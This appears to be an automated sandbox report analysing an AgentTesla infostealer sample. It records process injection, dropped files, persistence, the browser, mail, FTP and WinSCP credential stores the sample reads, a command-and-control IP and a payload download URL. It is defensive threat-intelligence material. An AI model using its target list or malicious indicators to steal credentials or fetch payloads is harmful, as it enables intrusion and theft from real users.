                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory written: C:\Users\user\Desktop\Ref#0503711.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory written: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\AppData\Local\Temp\docdd.exe "C:\Users\user\AppData\Local\Temp\docdd.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Users\user\Desktop\Ref#0503711.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\docdd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Users\user\Desktop\Ref#0503711.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7416, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7416, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2919838157.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7416, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Credentials in Registry                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Registry Run Keys / Startup Folder                      		31
                      Obfuscated Files or Information                      		Security Account Manager1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing                      		NTDS221
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials151
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528272 Sample: Ref#0503711.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 36 tempfiles.ninja 2->36 38 api.ipify.org 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 10 other signatures 2->52 10 Ref#0503711.exe 1 6 2->10         started        signatures3 process4 file5 30 C:\Users\user\AppData\Roaming\ioibrzb.exe, PE32 10->30 dropped 32 C:\Users\user\AppData\Local\Temp\docdd.exe, PE32 10->32 dropped 34 C:\Users\user\...\ioibrzb.exe:Zone.Identifier, ASCII 10->34 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->60 62 Injects a PE file into a foreign processes 10->62 14 Ref#0503711.exe 14 2 10->14         started        18 docdd.exe 15 6 10->18         started        signatures6 process7 dnsIp8 40 162.254.34.31, 49733, 587 VIVIDHOSTINGUS United States 14->40 42 api.ipify.org 172.67.74.152, 443, 49732 CLOUDFLARENETUS United States 14->42 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->64 66 Tries to steal Mail credentials (via file / registry access) 14->66 68 Tries to harvest and steal ftp login credentials 14->68 70 Tries to harvest and steal browser information (history, passwords, etc) 14->70 44 tempfiles.ninja 104.21.56.249, 443, 49731 CLOUDFLARENETUS United States 18->44 28 C:\Users\user\AppData\...\tmp2083.tmp.exe, PE32 18->28 dropped 72 Machine Learning detection for dropped file 18->72 21 tmp2083.tmp.exe 2 18->21         started        file9 signatures10 process11 signatures12 54 Machine Learning detection for dropped file 21->54 56 Injects a PE file into a foreign processes 21->56 24 tmp2083.tmp.exe 21->24         started        process13 process14 26 WerFault.exe 24->26         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Ref#0503711.exe32%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                      Ref#0503711.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\docdd.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ioibrzb.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ipify.org/0%URL Reputationsafe
                      https://api.ipify.org0%URL Reputationsafe
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                      https://api.ipify.org/t0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      tempfiles.ninja
                      		104.21.56.249
                      		truefalse
                        		unknown
                        api.ipify.org
                        		172.67.74.152
                        		truefalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown
                          https://tempfiles.ninja/d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJrfalse
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.orgRef#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/mgravell/protobuf-netiRef#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://stackoverflow.com/q/14436606/23354Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://account.dyn.com/Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/mgravell/protobuf-netJRef#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://tempfiles.ninjadocdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://stackoverflow.com/q/11564914/23354;Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://stackoverflow.com/q/2152978/23354Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-netRef#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://tempfiles.ninjaddocdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.ipify.org/tRef#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempfiles.ninjadocdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        162.254.34.31
                                        		unknownUnited States
                                        		64200VIVIDHOSTINGUStrue
                                        104.21.56.249
                                        		tempfiles.ninjaUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        172.67.74.152
                                        		api.ipify.orgUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1528272
                                        Start date and time:2024-10-07 18:04:58 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 55s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Ref#0503711.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@10/5@2/3
                                        EGA Information:
                                        • Successful, ratio: 60%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 478
                                        • Number of non-executed functions: 42
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target docdd.exe, PID 7392 because it is empty
                                        • Execution Graph export aborted for target tmp2083.tmp.exe, PID 7692 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Ref#0503711.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        12:05:51API Interceptor26x Sleep call for process: docdd.exe modified
                                        12:05:52API Interceptor25x Sleep call for process: Ref#0503711.exe modified
                                        17:05:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ioibrzb C:\Users\user\AppData\Roaming\ioibrzb.exe
                                        17:06:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ioibrzb C:\Users\user\AppData\Roaming\ioibrzb.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        162.254.34.31Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                          Ref_5010_103.exeGet hashmaliciousAgentTeslaBrowse
                                            Ship_Doc_18505.exeGet hashmaliciousAgentTeslaBrowse
                                              Booking-103.exeGet hashmaliciousAgentTeslaBrowse
                                                Ref Cheque 705059.vbeGet hashmaliciousAgentTeslaBrowse
                                                  INVOICE AA MARINE CONTRACTING 92900202002-PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                    Request For Quote document.exeGet hashmaliciousAgentTeslaBrowse
                                                      REF DOCUMENTS.jsGet hashmaliciousAgentTeslaBrowse
                                                        Booking_261.exeGet hashmaliciousAgentTesla, Clipboard HijackerBrowse
                                                          Payment Confirmation Documents.vbeGet hashmaliciousAgentTeslaBrowse
                                                            104.21.56.2491U34vTVJ97.pdfGet hashmaliciousUnknownBrowse
                                                              172.67.74.152file.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                              • api.ipify.org/
                                                              Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                              • api.ipify.org/
                                                              2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                              • api.ipify.org/
                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                              • api.ipify.org/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              tempfiles.ninja1U34vTVJ97.pdfGet hashmaliciousUnknownBrowse
                                                              • 104.21.56.249
                                                              api.ipify.org8ID0109FLT24PO92CD-R.pdfGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.26.12.205
                                                              shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              MAVI VATAN - VSL's DETAILS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.12.205
                                                              http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.htmlGet hashmaliciousUnknownBrowse
                                                              • 172.67.74.152
                                                              New order.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              http://netflix.dittmedlemskap.com/Get hashmaliciousUnknownBrowse
                                                              • 172.67.74.152
                                                              DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/656749019228815Get hashmaliciousHTMLPhisherBrowse
                                                              • 172.67.74.152
                                                              http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/581207279857749Get hashmaliciousHTMLPhisherBrowse
                                                              • 172.67.74.152

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              VIVIDHOSTINGUSkkk.exeGet hashmaliciousFormBookBrowse
                                                              • 162.254.32.121
                                                              Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                              • 162.254.34.125
                                                              Ref_5010_103.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
